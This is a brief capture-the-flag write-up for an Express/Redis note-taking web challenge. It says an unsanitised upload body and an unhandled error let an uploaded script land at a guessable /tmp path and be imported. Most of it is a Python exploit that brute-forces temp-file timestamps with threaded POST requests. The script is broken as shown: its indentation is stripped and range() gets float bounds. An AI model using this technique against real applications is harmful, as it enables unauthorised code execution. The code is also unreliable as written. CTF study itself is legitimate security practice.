Tags: web redis file_upload express nodejs
Rating:
The application was a note-taking webapp with a functionality of also adding file attachements.
Not sanitizing user provided body and not handilng an error led to uploading a malicious script to a known location and importing it to an unsafe "sandboxed" script,
exploit script
```python
import requests
import threading
HOST = 'express-notes.ctfz.one'
cookies = {
'lang': 'en-US',
'connect.sid': '<session-cookie>'
}
headers = {
'Host': HOST,
'Content-Type': 'application/x-www-form-urlencoded'
}
def run_in_thread(fn):
def run(*k, **kw):
t = threading.Thread(target=fn, args=k, kwargs=kw)
t.start()
return t
return run
@run_in_thread
def run_brute(timestamps):
for timestamp in timestamps:
brute(timestamp)
def brute(timestamp):
data = 'title=test&content=test&fileLoaded=true&file=/tmp/tmp-1-%s' % (timestamp)
response = requests.post('https://%s/notes' % HOST, cookies=cookies, headers=headers, data=data, allow_redirects=True)
print(data, response.elapsed.total_seconds())
response_time = 1661424636000
NUM_THREADS = 5
LIMIT = 1000 / NUM_THREADS
for n in range(NUM_THREADS):
start = response_time + LIMIT * n
end = start + LIMIT
run_brute(range(start, end))
```
read more here - https://blog.xss.am/2022/08/offzone-express-notes/